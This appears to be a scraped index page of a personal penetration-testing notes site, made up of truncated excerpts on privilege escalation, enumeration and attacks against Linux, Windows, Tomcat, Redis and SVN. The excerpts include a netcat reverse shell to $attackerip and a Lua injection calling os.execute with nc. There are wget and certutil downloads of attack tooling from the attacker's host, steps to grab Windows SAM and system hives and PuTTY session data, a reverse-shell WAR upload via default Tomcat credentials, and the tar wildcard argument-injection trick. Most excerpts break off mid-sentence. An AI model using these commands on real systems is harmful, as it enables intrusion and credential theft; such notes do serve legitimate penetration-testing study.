Logrotate exploit RCE until 12.8.1
Standard on port 9001. Default htauth user / 123
https://www.syhunt.com/en/index.php?n=Articles.LuaVulnerabilities Notes A comment can be done with //. Add this after an injectionindex?file=bla');os.execute('nc...')--
Prepare the own system: cd p151.general.1 ./scripts/update_privesc_scripts.sh cd scripts/privesc/linux python -m SimpleHTTPServer 80 Prepare the target: cd /dev/shm wget http://$attackerip/_ex.tar tar xf _ex.tar script Now, execute it: LinPeas: ./linpeas.sh LinEnum: ./LinEnum.sh linux-smart-enumeration: ./lse.sh ‑l1 linux-exploit-suggester‑2: ./linux-exploit-suggester‑2.pl sudo-killer: ./SUDO_KILLERv2.0.5.sh linuxprivchecker: ./linuxprivchecker.py Finally: Copy typescript file to the PentestManager!
Additional ideas Environment exploitation Interpolation exploitation Prerequisites: Then, create a file in a directory which is names like parameters from the program. The program will interpret the filenames as arguments. Example: Assume there is a call like this in a script: tar czf /tmp/backup.tar.gz * The script is in /home/peter and because we are this…
If your console is narrow, widen it at the beginning: stty rows 50 cols 200 Consider to directly spawn another reverse shell: nc -e /bin/sh $attackerip 4444 & Basic enumeration about the host idgroupscat /etc/passwdcat /etc/groupcat /etc/hostscat /etc/fstabuname -a // Check for kernel exploits // ALSO search for kernel exploits with OS name! // If this…
Important notes Copy+paste For Linux: base64 r > r.b64 ... base64 --decode -i r.b64 > r.tar For Windows: base64 p64.exe | sed 's/^(.*)$/echo \1 >> b64/g' ... certutil -encode file.exe b64.txt certutil -decode b64.txt file.exe Alternative: python -c "open('test.b64','wb').write(open('test.txt').read().encode('base64'))" ... python -c "open('test.txt','wb').write(open('test.b64').read().decode('base64'))" Alternative: python -m base64 -e test > test.b64 ... python -m base64…
Execution If you cannot execute an exe file, try these options: Windows firewall / netsh Check firewall state netsh advfirewall show currentprofile netsh advfirewall show state If the firewall is active, list the configuration: netsh advfirewall show config Example how to add exceptions into the firewall via the command line from an administrator: C:\Windows\temp> netsh advfirewall firewall…
Grab the SAM and system file: %windir%\repair\sam %windir%\System32\config\RegBack\SAM %windir%\system32\config\SAM %windir%\repair\system %windir%\System32\config\RegBack\system %windir%\system32\config\system (Re-) Run the credential retrievers from the script page.
PuTTY stores session information in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Prepare the own system: cd p151.general.1/scripts/privesc/windows python -m SimpleHTTPServer 80 Prepare the target: set NTPSRV=$ownIp mkdir C:\Windows\System32\spool\drivers\color\wsc cd C:\Windows\System32\spool\drivers\color\wsc Download most scripts at once (>30 MB!): certutil.exe -urlcache -split -f "http://$NTPSRV/7za.exe certutil.exe -urlcache -split -f "http://$NTPSRV/_ex.zip 7za.exe x _ex.zip WinPeas Github winPEAS.batwinPEASx86.exewinPEASx64.exe Powerless Github certutil.exe -urlcache -split -f "http://$NTPSRV/Powerless.bat" Powerless.bat Powerless.bat Windows Exploit Suggester NG Github…
dir General: Usual commands: Therefore: Remember to use dir /R /as /ah -force. tree Start with creating a list of all directories and files. Download it. It’s way easier to look in a local editor and it’s stored for the future as well. tree c:\ > C:\Windows\Temp\dsys\dirs.txtdir /s /R /as /ah c:\ > C:\Windows\Temp\dsys\files.txt(Download the files)…
General system enumeration Get general information about the OS: systeminfo Get the environment variabes: set Enumerate cached credentials: cmdkey /list If the current system is not known yet, try to determine the version via one of the following files: Processes enumeration tasklist /Vtasklist /V | find "cmd.exe" // Search for a commandtasklist /V /fi "USERNAME eq NT…
After these steps, more things to do: Work with processes For enumeration of processes, see the Basic Windows system enumeration post. Kill a process taskkill /PID $pid taskkill /IM notepad.exe pskill /accepteula $pid // With SysinternalTools Suspend and continue a running process with SysinternalTools: pssuspend /accepteula notepad.exe ... pssuspend /accepteula -r notepad.exe Work with DLL’s Show all…
Enumeration Mandatory Try to checkout a repo:svn checkout svn://$target Optional Check all branches Go through each revision. (Use grep widely!) Add a new file which could be accessible in the web.
Blue team Use knockd to hide SSH List the arp cache and check if multiple IPs routes to the same physical adress. Maybe a MitM attack is in progress. More secure development If an attacker can write files but not directories, it could be a good idea to store sensitive files in another subdir. If this…
Enumeration Mandatory Check on the HTTP port 8080 if /manager is accessible (default credentials: tomcat / s3cret or admin / admin). If yes, upload a reverse shell WAR file. Optional Try to brute-force with msf> use scanner/http/tomcat_mgr_login.
Enumeration Mandatory Try to connect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can determine the existence of directories.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write. General commands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Possible places: Upload a…
Enumeration Mandatory Optional
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';